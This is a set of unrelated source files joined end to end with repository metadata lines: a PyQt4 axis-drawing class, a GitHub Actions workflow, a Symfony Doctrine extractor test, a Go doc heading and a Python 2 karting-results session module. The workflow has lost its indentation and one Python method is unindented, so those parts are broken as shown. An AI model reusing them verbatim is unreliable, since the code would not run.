can either be AxisStart, AxisEnd or AxisMiddle. The default is AxisMiddle
.. attribute:: arrows
A bitfield containing AxisEnd if an arrow should be drawn at the line's end (line.p2())
and AxisStart if there should be an arrows at the first point.
By default, there's an arrow at the end of the line
.. attribute:: zoomable
If this is set to True, the axis line will zoom together with the rest of the graph.
Otherwise, the line will remain in place and only tick marks will zoom.
.. method:: make_title
Makes a pretty title, with the quantity title in italics and the unit in normal text
.. method:: label_pos
Controls where the axis title and tick marks are placed relative to the axis
"""
from math import *
from PyQt4.QtGui import QGraphicsItem, QGraphicsLineItem, QGraphicsTextItem, QPainterPath, QGraphicsPathItem, QGraphicsScene, QTransform, QGraphicsRectItem, QPen, QFontMetrics
from PyQt4.QtCore import QLineF, QPointF, QRectF, Qt
from owconstants import *
from owtools import resize_plot_item_list
from owpalette import OWPalette
class OWAxis(QGraphicsItem):
    # Palette role used when querying the plot for this item's color.
    Role = OWPalette.Axis

    def __init__(self, id, title = '', title_above = False, title_location = AxisMiddle, line = None, arrows = 0, plot = None):
        # id: axis identifier (compared against XAxes/YAxes constants);
        # line: the data-space QLineF; plot: owning plot (color/bounds source).
        QGraphicsItem.__init__(self)
        self.setFlag(QGraphicsItem.ItemHasNoContents)
        self.setZValue(AxisZValue)
        self.id = id
        self.title = title
        self.title_location = title_location
        self.data_line = line
        self.plot = plot
        self.graph_line = None
        self.size = None
        self.scale = None
        # (major, medium, minor) tick lengths in pixels.
        self.tick_length = (10, 5, 0)
        self.arrows = arrows
        self.title_above = title_above
        self.line_item = QGraphicsLineItem(self)
        self.title_item = QGraphicsTextItem(self)
        self.end_arrow_item = None
        self.start_arrow_item = None
        self.show_title = False
        # NOTE(review): self.scale is assigned None twice in this
        # constructor — the second assignment is redundant.
        self.scale = None
        # Small triangle used as the arrow head at the line's end(s).
        path = QPainterPath()
        path.setFillRule(Qt.WindingFill)
        path.moveTo(0, 3.09)
        path.lineTo(0, -3.09)
        path.lineTo(9.51, 0)
        path.closeSubpath()
        self.arrow_path = path
        self.label_items = []
        self.label_bg_items = []
        self.tick_items = []
        self._ticks = []
        self.zoom_transform = QTransform()
        self.labels = None
        self.auto_range = None
        self.auto_scale = True
        self.zoomable = False
        self.update_callback = None
        self.max_text_width = 50
        self.text_margin = 5
        self.always_horizontal_text = False

    def update_ticks(self):
        """Rebuild self._ticks as (value, text, tick_size, step) tuples,
        either from explicit labels or from the (auto) scale."""
        self._ticks = []
        major, medium, minor = self.tick_length
        if self.labels is not None and not self.auto_scale:
            # Discrete axis: one tick per label, at integer positions.
            for i, text in enumerate(self.labels):
                self._ticks.append( ( i, text, medium, 1 ) )
        else:
            if self.scale and not self.auto_scale:
                min, max, step = self.scale
            elif self.auto_range:
                min, max = self.auto_range
                if min is not None and max is not None:
                    step = (max - min)/10
                else:
                    return
            else:
                return
            if max == min:
                return
            # Choose a "nice" step: the leading digit is 1, 2 or 5 times a
            # power of ten, based on the magnitude of the axis span.
            magnitude = int(3*log10(abs(max-min)) + 1)
            if magnitude % 3 == 0:
                first_place = 1
            elif magnitude % 3 == 1:
                first_place = 2
            else:
                first_place = 5
            # NOTE(review): integer division intended here (Python 2 '/').
            magnitude = magnitude / 3 - 1
            step = first_place * pow(10, magnitude)
            val = ceil(min/step) * step
            while val <= max:
                self._ticks.append( ( val, "%.4g" % val, medium, step ) )
                val = val + step

    def update_graph(self):
        # Notify the owning plot that this axis changed (callback is
        # installed by the plot, may be None).
        if self.update_callback:
            self.update_callback()

    def update(self, zoom_only = False):
        """Recompute and reposition all child items (line, title, arrows,
        tick marks and tick labels). With zoom_only=True, label HTML and
        arrow items are reused and only geometry is refreshed."""
        self.update_ticks()
        line_color = self.plot.color(OWPalette.Axis)
        text_color = self.plot.color(OWPalette.Text)
        if not self.graph_line or not self.scene():
            return
        self.line_item.setLine(self.graph_line)
        self.line_item.setPen(line_color)
        if self.title:
            self.title_item.setHtml('<b>' + self.title + '</b>')
            self.title_item.setDefaultTextColor(text_color)
        # Fractional position of the title along the axis line.
        if self.title_location == AxisMiddle:
            title_p = 0.5
        elif self.title_location == AxisEnd:
            title_p = 0.95
        else:
            title_p = 0.05
        title_pos = self.graph_line.pointAt(title_p)
        # Unit normal of the axis line; also reused below for tick marks.
        v = self.graph_line.normalVector().unitVector()
        dense_text = False
        # Offset of the title from the line, larger when tick labels are
        # long enough that they are drawn rotated ("dense").
        if hasattr(self, 'title_margin'):
            offset = self.title_margin
        elif self._ticks:
            if self.should_be_expanded():
                offset = 55
                dense_text = True
            else:
                offset = 35
        else:
            offset = 10
        if self.title_above:
            title_pos = title_pos + (v.p2() - v.p1())*(offset + QFontMetrics(self.title_item.font()).height())
        else:
            title_pos = title_pos - (v.p2() - v.p1())*offset
        ## TODO: Move it according to self.label_pos
        self.title_item.setVisible(self.show_title)
        self.title_item.setRotation(-self.graph_line.angle())
        c = self.title_item.mapToParent(self.title_item.boundingRect().center())
        tl = self.title_item.mapToParent(self.title_item.boundingRect().topLeft())
        self.title_item.setPos(title_pos - c + tl)
        ## Arrows: drop and recreate them on a full update so style changes
        ## take effect; keep them when only zooming.
        if not zoom_only:
            if self.start_arrow_item:
                self.scene().removeItem(self.start_arrow_item)
                self.start_arrow_item = None
            if self.end_arrow_item:
                self.scene().removeItem(self.end_arrow_item)
                self.end_arrow_item = None
        if self.arrows & AxisStart:
            if not zoom_only or not self.start_arrow_item:
                self.start_arrow_item = QGraphicsPathItem(self.arrow_path, self)
            self.start_arrow_item.setPos(self.graph_line.p1())
            self.start_arrow_item.setRotation(-self.graph_line.angle() + 180)
            self.start_arrow_item.setBrush(line_color)
            self.start_arrow_item.setPen(line_color)
        if self.arrows & AxisEnd:
            if not zoom_only or not self.end_arrow_item:
                self.end_arrow_item = QGraphicsPathItem(self.arrow_path, self)
            self.end_arrow_item.setPos(self.graph_line.p2())
            self.end_arrow_item.setRotation(-self.graph_line.angle())
            self.end_arrow_item.setBrush(line_color)
            self.end_arrow_item.setPen(line_color)
        ## Labels: grow/shrink the pooled child-item lists to one per tick.
        n = len(self._ticks)
        resize_plot_item_list(self.label_items, n, QGraphicsTextItem, self)
        resize_plot_item_list(self.label_bg_items, n, QGraphicsRectItem, self)
        resize_plot_item_list(self.tick_items, n, QGraphicsLineItem, self)
        # Slightly enlarged bounding rect of the axis line; ticks that fall
        # outside it (because of zoom) are hidden rather than drawn.
        test_rect = QRectF(self.graph_line.p1(), self.graph_line.p2()).normalized()
        test_rect.adjust(-1, -1, 1, 1)
        # n_p: unit offset away from the line (label side);
        # l_p: unit offset along the line.
        n_v = self.graph_line.normalVector().unitVector()
        if self.title_above:
            n_p = n_v.p2() - n_v.p1()
        else:
            n_p = n_v.p1() - n_v.p2()
        l_v = self.graph_line.unitVector()
        l_p = l_v.p2() - l_v.p1()
        for i in range(n):
            pos, text, size, step = self._ticks[i]
            hs = 0.5 * step
            tick_pos = self.map_to_graph( pos )
            if not test_rect.contains(tick_pos):
                self.tick_items[i].setVisible(False)
                self.label_items[i].setVisible(False)
                continue
            item = self.label_items[i]
            item.setVisible(True)
            if not zoom_only:
                # Horizontal axes get centered labels.
                if self.id in XAxes or getattr(self, 'is_horizontal', False):
                    item.setHtml( '<center>' + Qt.escape(text.strip()) + '</center>')
                else:
                    item.setHtml(Qt.escape(text.strip()))
            item.setTextWidth(-1)
            text_angle = 0
            if dense_text:
                # Long labels: clamp width and rotate them perpendicular
                # to the axis so neighbours don't overlap.
                w = min(item.boundingRect().width(), self.max_text_width)
                item.setTextWidth(w)
                if self.title_above:
                    label_pos = tick_pos + n_p * (w + self.text_margin) + l_p * item.boundingRect().height()/2
                else:
                    label_pos = tick_pos + n_p * self.text_margin + l_p * item.boundingRect().height()/2
                text_angle = -90 if self.title_above else 90
            else:
                # Normal labels: width limited by the distance between
                # neighbouring ticks, centered on the tick.
                w = min(item.boundingRect().width(), QLineF(self.map_to_graph(pos - hs), self.map_to_graph(pos + hs) ).length())
                label_pos = tick_pos + n_p * self.text_margin - l_p * w/2
                item.setTextWidth(w)
            if not self.always_horizontal_text:
                if self.title_above:
                    item.setRotation(-self.graph_line.angle() - text_angle)
                else:
                    item.setRotation(self.graph_line.angle() - text_angle)
            item.setPos(label_pos)
            item.setDefaultTextColor(text_color)
            # Opaque background rect so labels stay readable over the plot.
            self.label_bg_items[i].setRect(item.boundingRect())
            self.label_bg_items[i].setPen(QPen(Qt.NoPen))
            self.label_bg_items[i].setBrush(self.plot.color(OWPalette.Canvas))
            # The tick mark itself: a short segment normal to the axis.
            item = self.tick_items[i]
            item.setVisible(True)
            tick_line = QLineF(v)
            tick_line.translate(-tick_line.p1())
            tick_line.setLength(size)
            if self.title_above:
                tick_line.setAngle(tick_line.angle() + 180)
            item.setLine( tick_line )
            item.setPen(line_color)
            item.setPos(self.map_to_graph(pos))

    @staticmethod
    def make_title(label, unit = None):
        # Quantity in italics, optional unit in brackets, e.g. "<i>x</i> [m]".
        lab = '<i>' + label + '</i>'
        if unit:
            lab = lab + ' [' + unit + ']'
        return lab

    def set_line(self, line):
        # Set the scene-space line along which the axis is drawn.
        self.graph_line = line
        self.update()

    def set_title(self, title):
        self.title = title
        self.update()

    def set_show_title(self, b):
        self.show_title = b
        self.update()

    def set_labels(self, labels):
        # Switch to a discrete axis with one tick per label.
        self.labels = labels
        self.graph_line = None
        self.auto_scale = False
        self.update_ticks()
        self.update_graph()

    def set_scale(self, min, max, step_size):
        # Switch to a fixed continuous scale (disables auto-scaling).
        self.scale = (min, max, step_size)
        self.graph_line = None
        self.auto_scale = False
        self.update_ticks()
        self.update_graph()

    def set_tick_length(self, minor, medium, major):
        self.tick_length = (minor, medium, major)
        self.update()

    def map_to_graph(self, x):
        """Map an axis value to a point on the (possibly zoomed) axis line;
        zoom moves the point, which is then projected back onto the line
        unless the axis itself is zoomable."""
        min, max = self.plot.bounds_for_axis(self.id)
        if min == max:
            return QPointF()
        line_point = self.graph_line.pointAt( (x-min)/(max-min) )
        end_point = line_point * self.zoom_transform
        return self.projection(end_point, self.graph_line)

    @staticmethod
    def projection(point, line):
        # Orthogonal projection of `point` onto `line` (as an infinite line).
        norm = line.normalVector()
        norm.translate(point - norm.p1())
        p = QPointF()
        # NOTE(review): `type` shadows the builtin; the intersection type is
        # discarded — only the intersection point `p` is used.
        type = line.intersect(norm, p)
        return p

    def continuous_labels(self):
        # NOTE(review): appears unfinished/unused — computes values but
        # neither returns nor stores anything.
        min, max, step = self.scale
        magnitude = log10(abs(max-min))

    def paint(self, painter, option, widget):
        # All drawing is delegated to child items (ItemHasNoContents).
        pass

    def boundingRect(self):
        return QRectF()

    def ticks(self):
        # Lazily computed list of (value, text, tick_size, step) tuples.
        if not self._ticks:
            self.update_ticks()
        return self._ticks

    def bounds(self):
        """Data-space (min, max) of this axis; label axes get a small
        margin around the integer label positions."""
        if self.labels:
            return -0.2, len(self.labels) -0.8
        elif self.scale:
            min, max, _step = self.scale
            return min, max
        elif self.auto_range:
            return self.auto_range
        else:
            return 0, 1

    def should_be_expanded(self):
        # True when tick labels are long enough (rough 12px-per-char
        # estimate) that they must be rotated / given extra room.
        self.update_ticks()
        return self.id in YAxes or self.always_horizontal_text or sum(len(t[1]) for t in self._ticks) * 12 > self.plot.width()
name: Junie
run-name: Junie run ${{ inputs.run_id }}
permissions:
contents: write
pull-requests: write
on:
workflow_dispatch:
inputs:
run_id:
description: "id of workflow process"
required: true
workflow_params:
description: "stringified params"
required: true
jobs:
call-workflow-passing-data:
uses: jetbrains-junie/junie-workflows/.github/workflows/ej-issue.yml@main
with:
workflow_params: ${{ inputs.workflow_params }}
fix_conflicts: false
skip_workflow_file_validation: false | unknown | github | https://github.com/ktorio/ktor | .github/workflows/junie.yml |
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bridge\Doctrine\Tests\PropertyInfo;
use Doctrine\Common\Collections\Collection;
use Doctrine\Common\EventManager;
use Doctrine\DBAL\DriverManager;
use Doctrine\DBAL\Schema\DefaultSchemaManagerFactory;
use Doctrine\DBAL\Types\Type as DBALType;
use Doctrine\ORM\EntityManager;
use Doctrine\ORM\Mapping\Driver\AttributeDriver;
use Doctrine\ORM\ORMSetup;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\TestCase;
use Symfony\Bridge\Doctrine\PropertyInfo\DoctrineExtractor;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineDummy;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineEmbeddable;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineEnum;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineGeneratedValue;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineRelation;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineWithEmbedded;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\EnumInt;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\EnumString;
use Symfony\Component\TypeInfo\Type;
/**
* @author Kévin Dunglas <dunglas@gmail.com>
*/
class DoctrineExtractorTest extends TestCase
{
    private function createExtractor(): DoctrineExtractor
    {
        // Boot an in-memory SQLite EntityManager over the attribute-mapped
        // fixture entities. The custom "foo" DBAL type is registered only
        // once, because DBAL type registration is process-global.
        $config = ORMSetup::createConfiguration(true);
        $config->setMetadataDriverImpl(new AttributeDriver([__DIR__.'/../Tests/Fixtures' => 'Symfony\Bridge\Doctrine\Tests\Fixtures'], true));
        $config->setSchemaManagerFactory(new DefaultSchemaManagerFactory());
        $config->enableNativeLazyObjects(true);
        $eventManager = new EventManager();
        $entityManager = new EntityManager(DriverManager::getConnection(['driver' => 'pdo_sqlite'], $config, $eventManager), $config, $eventManager);

        if (!DBALType::hasType('foo')) {
            DBALType::addType('foo', 'Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineFooType');
            $entityManager->getConnection()->getDatabasePlatform()->registerDoctrineTypeMapping('custom_foo', 'foo');
        }

        return new DoctrineExtractor($entityManager);
    }

    public function testGetProperties()
    {
        // Fields
        $expected = [
            'id',
            'guid',
            'time',
            'timeImmutable',
            'dateInterval',
            'simpleArray',
            'float',
            'decimal',
            'bool',
            'binary',
            'customFoo',
            'bigint',
            'json',
        ];

        // Associations
        $expected = array_merge($expected, [
            'foo',
            'bar',
            'indexedRguid',
            'indexedBar',
            'indexedFoo',
            'indexedBaz',
            'indexedByDt',
            'indexedByCustomType',
            'indexedBuz',
            'dummyGeneratedValueList',
        ]);

        $this->assertEquals(
            $expected,
            $this->createExtractor()->getProperties(DoctrineDummy::class)
        );
    }

    public function testTestGetPropertiesWithEmbedded()
    {
        // Embeddables are reported as a single property, not flattened.
        $this->assertEquals(
            [
                'id',
                'embedded',
            ],
            $this->createExtractor()->getProperties('Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineWithEmbedded')
        );
    }

    public function testGetPropertiesCatchException()
    {
        // Unknown classes must yield null rather than throwing.
        $this->assertNull($this->createExtractor()->getProperties('Not\Exist'));
    }

    public function testGeneratedValueNotWritable()
    {
        // A generated identifier is explicitly not writable; readability
        // and non-id fields are left undecided (null).
        $extractor = $this->createExtractor();
        $this->assertFalse($extractor->isWritable(DoctrineGeneratedValue::class, 'id'));
        $this->assertNull($extractor->isReadable(DoctrineGeneratedValue::class, 'id'));
        $this->assertNull($extractor->isWritable(DoctrineGeneratedValue::class, 'foo'));
        $this->assertNull($extractor->isReadable(DoctrineGeneratedValue::class, 'foo'));
    }

    public function testExtractWithEmbedded()
    {
        $this->assertEquals(
            Type::object(DoctrineEmbeddable::class),
            $this->createExtractor()->getType(DoctrineWithEmbedded::class, 'embedded'),
        );
    }

    public function testExtractEnum()
    {
        $this->assertEquals(Type::enum(EnumString::class), $this->createExtractor()->getType(DoctrineEnum::class, 'enumString'));
        $this->assertEquals(Type::enum(EnumInt::class), $this->createExtractor()->getType(DoctrineEnum::class, 'enumInt'));
        $this->assertNull($this->createExtractor()->getType(DoctrineEnum::class, 'enumStringArray'));
        $this->assertEquals(Type::list(Type::enum(EnumInt::class)), $this->createExtractor()->getType(DoctrineEnum::class, 'enumIntArray'));
        $this->assertNull($this->createExtractor()->getType(DoctrineEnum::class, 'enumCustom'));
    }

    #[DataProvider('typeProvider')]
    public function testExtract(string $property, ?Type $type)
    {
        $this->assertEquals($type, $this->createExtractor()->getType(DoctrineDummy::class, $property, []));
    }

    /**
     * @return iterable<array{0: string, 1: ?Type}>
     */
    public static function typeProvider(): iterable
    {
        yield ['id', Type::int()];
        yield ['guid', Type::string()];
        yield ['bigint', Type::union(Type::int(), Type::string())];
        yield ['time', Type::object(\DateTime::class)];
        yield ['timeImmutable', Type::object(\DateTimeImmutable::class)];
        yield ['dateInterval', Type::object(\DateInterval::class)];
        yield ['float', Type::float()];
        yield ['decimal', Type::string()];
        yield ['bool', Type::bool()];
        yield ['binary', Type::resource()];
        yield ['foo', Type::nullable(Type::object(DoctrineRelation::class))];
        yield ['bar', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
        yield ['indexedRguid', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
        yield ['indexedBar', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
        yield ['indexedFoo', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
        yield ['indexedBaz', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
        yield ['simpleArray', Type::list(Type::string())];
        yield ['customFoo', null];
        yield ['notMapped', null];
        yield ['indexedByDt', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::object())];
        yield ['indexedByCustomType', null];
        yield ['indexedBuz', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
        yield ['dummyGeneratedValueList', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
        yield ['json', null];
    }

    public function testGetTypeCatchException()
    {
        $this->assertNull($this->createExtractor()->getType('Not\Exist', 'baz'));
    }
}
### Minor changes to the library {#minor_library_changes} | unknown | github | https://github.com/golang/go | doc/initial/6-stdlib/99-minor/0-heading.md |
import ujson as json
import requests
import os
import re
from tinydb import where
from driver import Driver
class Session():
    def __init__(self, config, round_obj, stype, sid="", filename=None):
        # config: global configuration accessor; round_obj: the round this
        # session belongs to; stype: session type ("PRACTICE", "QUALIFY",
        # "HEAT" or "MAIN"); sid: optional sub-id (e.g. heat number);
        # filename: local JSON results file, used by read().
        self.config = config
        self.round_obj = round_obj
        self.stype = stype
        self.sid = sid
        self.filename = filename
        # Result rows, one dict per driver (filled by read()/download()).
        self.data = []
        # Map of misspelled driver names -> canonical names for this year.
        self.name_corrections = self.config.get_driver_name_corrections_as_dict(self.round_obj.year)
        # Stored post-race adjustments; presumably loaded from the DB by
        # load_point_adjustments() (defined elsewhere) — TODO confirm.
        self.point_adjustments = self.load_point_adjustments()
        # Guards apply_point_adjustments() against running twice.
        self.already_applied_point_adjustments = False

    def get_type(self):
        # Session type string, e.g. "HEAT".
        return self.stype

    def get_id(self):
        # Session sub-id, e.g. "1" for heat 1; may be empty.
        return self.sid

    def get_round(self):
        # The round object this session belongs to.
        return self.round_obj

    def get_name(self):
        # Canonical session name: "<stype>" or "<stype>-<sid>".
        name = self.stype
        if len(self.sid) > 0:
            name += "-" + self.sid
        return name
@staticmethod
def parse_name_into_stype_sid(name):
result = name.split("-")
stype = result[0]
sid = ""
if len(result) > 1:
sid = result[1]
return stype, sid
    def get_short_name(self):
        # Compact label used in standings tables: P, Q, H<number>, or M.
        if self.stype == "PRACTICE":
            return "P"
        elif self.stype == "QUALIFY":
            return "Q"
        elif self.stype == "HEAT":
            # for heats, we would like to remove all non-numbers (e.g. "heat 1D" -> "H1")
            return "H" + re.sub("[^0-9]", "", self.sid)
        elif self.stype == "MAIN":
            return "M"
        else:
            raise NameError("Unrecognized session type: " + self.stype)

    @staticmethod
    def strip_leading_zeroes(s):
        # Normalize times like "01:04.751" to "1:04.751"; None passes through.
        # A zero is only stripped when another digit follows it, so strings
        # like "0.5" or "0:59" are left intact.
        if s is not None:
            while len(s) > 1 and s[0] == '0' and str(s[1]).isdigit():
                s = s[1:]
        return s
    @staticmethod
    def clean_string(s1=None, s2=None):
        # Normalize a raw cell value: stringify, replace odd whitespace and
        # trim; returns the first of s1/s2 that is non-empty afterwards,
        # otherwise None.
        # NOTE(review): the replace() below looks like a collapsed
        # "double space -> single space" (or NBSP -> space) substitution
        # that was mangled in transit — confirm against the original.
        if s1 is not None:
            s1 = str(s1).replace(" ", " ").strip()
            if len(s1) > 0:
                return s1
        if s2 is not None:
            s2 = str(s2).replace(" ", " ").strip()
            if len(s2) > 0:
                return s2
        return None

    def is_race(self):
        # Heats and mains are races (have laps/gaps); practice and
        # qualifying only have best-lap data.
        return self.stype == "MAIN" or self.stype == "HEAT"

    def get_leader(self):
        # First row of the result sheet; sanity-check that it really is P1.
        result = self.data[0]
        if result["pos"] != "1":
            raise LookupError("Leader doesn't have first position: " + str(result))
        return result
    def get_time_difference(self, given_time, leader_time):
        # Difference in seconds (as a string); "N/A" if either side has
        # no recorded time.
        if given_time == "N/A" or leader_time == "N/A":
            return "N/A"
        t1 = self.str_time_to_float(given_time)
        t2 = self.str_time_to_float(leader_time)
        return str(t1 - t2)

    @staticmethod
    def str_time_to_float(str_time):
        # convert strings like "01:04.751" or "59.833" into floating-point number of seconds
        # (1, 2 or 3 colon-separated parts: S / M:S / H:M:S)
        items = str_time.split(":")
        if len(items) == 1:
            return float(items[0])
        elif len(items) == 2:
            return float(items[0]) * 60 + float(items[1])
        elif len(items) == 3:
            return float(items[0]) * 60 * 60 + float(items[1]) * 60 + float(items[2])
        else:
            raise TypeError("Invalid time: " + str_time)
    def get_url(self, mylaps_id):
        # Full URL of the MyLaps results endpoint for this session.
        return self.config.get_mylaps_session_page_url() + str(mylaps_id)

    def download(self, mylaps_id):
        # Fetch the raw session JSON from MyLaps and cache it on disk in the
        # round's directory as "<session name>.json".
        response = requests.get(self.get_url(mylaps_id))
        self.data = json.loads(response.content)
        # determine the directory
        dirname = self.round_obj.get_directory()
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        # store the json
        with open(dirname + "/" + self.get_name() + ".json", "w") as outfile:
            json.dump(self.data, outfile)
        # print name of the event
        print " [x] Downloaded '%s': %s" % (self.get_name(), self.get_url(mylaps_id))
    def read(self):
        # Load the cached results JSON into self.data, normalizing each row,
        # then renumber positions and compute best-lap gaps.
        # determine the directory
        dirname = self.round_obj.get_directory()
        fname = dirname + '/' + self.filename
        # print name of the event
        print " [x] Reading %s from '%s'" % (self.get_name(), fname)
        # Fields used from each row (Practice & Qualifier & Heat & Main):
        #   "position" - integer
        #   "start_number" - kart number
        #   "driver" - driver name (spaces must be trimmed from both ends)
        #   "best_time" - best lap
        #   "best_lap" - lap when best time was set
        #   "laps" - number of completed laps
        #   "diff_time" - time difference from P1 (can be empty for P1 and
        #                 also for last drivers; can also be DNF or DQ)
        data = json.load(open(fname))
        for row in data["classification"]["rows"]["default"]:
            entry = {
                "pos": self.clean_string(row["position"]),
                "kart": self.clean_string(row["start_number"]),
                "driver_name": self.clean_string(row["driver"]),
                "best_lap_time": self.strip_leading_zeroes(self.clean_string(row.get("best_time")))
            }
            if entry["best_lap_time"] is None:
                entry["best_lap_time"] = "N/A"
            # process driver status and copy it to pos too
            entry["status"] = row["status"].upper()
            if entry["status"] == 'NORMAL':
                # change it to a shorter version
                entry["status"] = 'OK'
            elif not self.is_not_regular_finish(entry["status"]):
                # if not DQ, DNF, or DNS, then raise exception
                raise LookupError("Unrecognized driver status in the session: " + row["status"])
            # races additionally carry lap counts and gaps to the leader
            if self.is_race():
                entry["best_lap_number"] = self.clean_string(row.get("best_lap"))
                if entry["best_lap_number"] is None:
                    entry["best_lap_number"] = "N/A"
                entry["laps_completed"] = self.clean_string(row["laps"])
                entry["gap_to_leader"] = self.strip_leading_zeroes(self.clean_string(row["diff_time"]))
                if entry["laps_completed"] is None:
                    entry["laps_completed"] = "0"
                if entry["gap_to_leader"] is None:
                    entry["gap_to_leader"] = ""
                else:
                    # to workaround differences between "1 Lap" and "1 lap"
                    entry["gap_to_leader"] = entry["gap_to_leader"].upper()
            self.data.append(entry)
        # reassign all positions
        self.reassign_positions()
        # calculate difference between best laps
        self.recalculate_best_lap_gaps()
    def merge_with(self, another):
        # this is useful for merging the results of mains into one single sheet
        # and then awarding points for the combined/unified race, from top to bottom
        for entry in another.data:
            self.data.append(entry)

    @staticmethod
    def is_not_regular_finish(status):
        # True for any status other than a normal finish.
        return status == 'DQ' or status == 'DNF' or status == 'DNS'

    def remove_not_finished(self):
        # drivers who got disqualified, or didn't finish, or didn't start will be removed
        # useful for merging the qualifiers together and keeping only drivers with valid best laps
        self.data = [c for c in self.data if c["status"] == 'OK']

    def remove_na_best_time(self):
        # drivers who didn't go on track have no best lap time; drop them
        self.data = [c for c in self.data if c["best_lap_time"] != "N/A"]
    def remove_duplicate_drivers_advanced_to_mains(self, season_data):
        # drivers who advance from one main to another (e.g. from B-main to A-main)
        # are present in both groups, so when calculating points these
        # duplicates should be removed. Rows are assumed to be ordered
        # best-main-first, so the first occurrence is the "higher" result.
        driver_names = {}
        for entry in self.data:
            driver_name, driver_classes = self.get_driver_name_and_classes(entry["driver_name"], season_data)
            # if driver is already present in the map, one of the two
            # occurrences must go
            if driver_name in driver_names:
                # let's see which one needs to be removed
                entry_higher = driver_names[driver_name]
                # if driver finished the higher main normally, drop the lower
                # result; otherwise drop the higher one (e.g. A-main = DQ,
                # B-main = points)
                if entry_higher["status"] == 'OK':
                    entry["to_be_removed"] = 1
                else:
                    entry_higher["to_be_removed"] = 1
            else:
                driver_names[driver_name] = entry
        # remove drivers marked for removal
        self.data = [c for c in self.data if not "to_be_removed" in c]
    def reassign_positions(self):
        # Renumber "pos" 1..N to match the current ordering of self.data.
        position = 1
        for entry in self.data:
            entry["pos"] = str(position)
            position += 1

    def recalculate_best_lap_gaps(self):
        # Store each entry's best-lap delta to the session leader.
        leader = self.get_leader()
        for entry in self.data:
            entry["best_lap_diff"] = self.get_time_difference(entry["best_lap_time"], leader["best_lap_time"])

    def compare_by_time(self, x, y):
        # cmp-style comparator over "MM:SS.mmm" time strings
        # (used with Python 2 sorted(cmp=...)).
        x_float = self.str_time_to_float(x)
        y_float = self.str_time_to_float(y)
        if x_float < y_float:
            return -1
        elif x_float > y_float:
            return 1
        else:
            return 0

    def sort_by_best_time(self):
        # Order entries by best lap time; `key` extracts the time string and
        # `cmp` compares the extracted strings numerically (Python 2 only).
        self.data = sorted(self.data, cmp=lambda x, y: self.compare_by_time(x, y), key=lambda x: x['best_lap_time'])
    def get_driver_name_and_classes(self, driver, season_data=None):
        # capture the part in square brackets, assuming the driver name will
        # be something like "John Doe [M][R]"; note that the driver can be in
        # multiple classes: "M" means masters, "R" means rookie, etc.
        driver_class_list = re.findall("\[(.*?)\]", driver)
        # put all classes into the set
        driver_classes = set("")
        for driver_class in driver_class_list:
            # check if it's a valid driver class
            if (season_data is not None) and (driver_class not in season_data.get_driver_classes()):
                print "Unrecognized driver class: " + driver
            else:
                driver_classes.add(driver_class)
        # this will actually remove the part in brackets
        driver_name = re.sub("\[.*?\]", "", driver)
        # normalize whitespace and leading/trailing spaces
        # NOTE(review): replace() below looks like a collapsed
        # "double space -> single space" substitution — confirm upstream.
        driver_name = driver_name.replace(" ", " ").strip()
        # also, apply corrections from the DB
        if driver_name in self.name_corrections:
            driver_name = self.name_corrections[driver_name]
        # return the tuple (canonical name, set of classes)
        return driver_name, driver_classes

    def lookup_driver_row_idx(self, driver_name):
        # Index of the row whose canonical driver name matches, or -1.
        # find driver
        idx = -1
        for i in xrange(len(self.data)):
            entry = self.data[i]
            if entry["driver_name_canonical"] == driver_name:
                idx = i
                break
        return idx
    def apply_adjustment_move_driver(self, driver_name, is_move_up):
        # Swap the driver one row up or down in self.data (a one-position
        # penalty/correction). Returns True when a swap happened.
        idx = self.lookup_driver_row_idx(driver_name)
        # if not found, return right away
        if idx < 0:
            return False
        # swap drivers (up)
        if is_move_up and idx - 1 >= 0:
            t = self.data[idx]
            self.data[idx] = self.data[idx - 1]
            self.data[idx - 1] = t
            return True
        # swap drivers (down)
        if not is_move_up and idx + 1 < len(self.data):
            t = self.data[idx]
            self.data[idx] = self.data[idx + 1]
            self.data[idx + 1] = t
            return True
        return False

    def apply_adjustment_assign_points_to_driver(self, driver_name, points):
        # Hard-override a driver's points (post-race penalty or bonus);
        # calc_points honours this "points" key over the position table.
        idx = self.lookup_driver_row_idx(driver_name)
        # if not found, return right away
        if idx < 0:
            return False
        self.data[idx]["points"] = points
        return True
    def apply_non_droppable(self, driver_name):
        # Mark this session result as non-droppable for the driver.
        idx = self.lookup_driver_row_idx(driver_name)
        # if not found, force addition of an entry to the list (likely, the
        # driver has been suspended)
        if idx < 0:
            # entry needs to be added, otherwise it won't count as non-droppable
            driver_name_canonical, driver_classes = self.get_driver_name_and_classes(driver_name)
            # synthesize a last-place DNS row for the missing driver
            entry = {
                "pos": int(self.data[-1]["pos"]) + 1,
                "driver_name": driver_name,
                "driver_name_canonical": driver_name_canonical,
                "status": 'DNS',
                "kart": 'N/A',
                "best_lap_time": 'N/A',
                "best_lap_number": "N/A",
                "laps_completed": "0",
                "gap_to_leader": ""
            }
            self.data.append(entry)
            idx = self.lookup_driver_row_idx(driver_name)
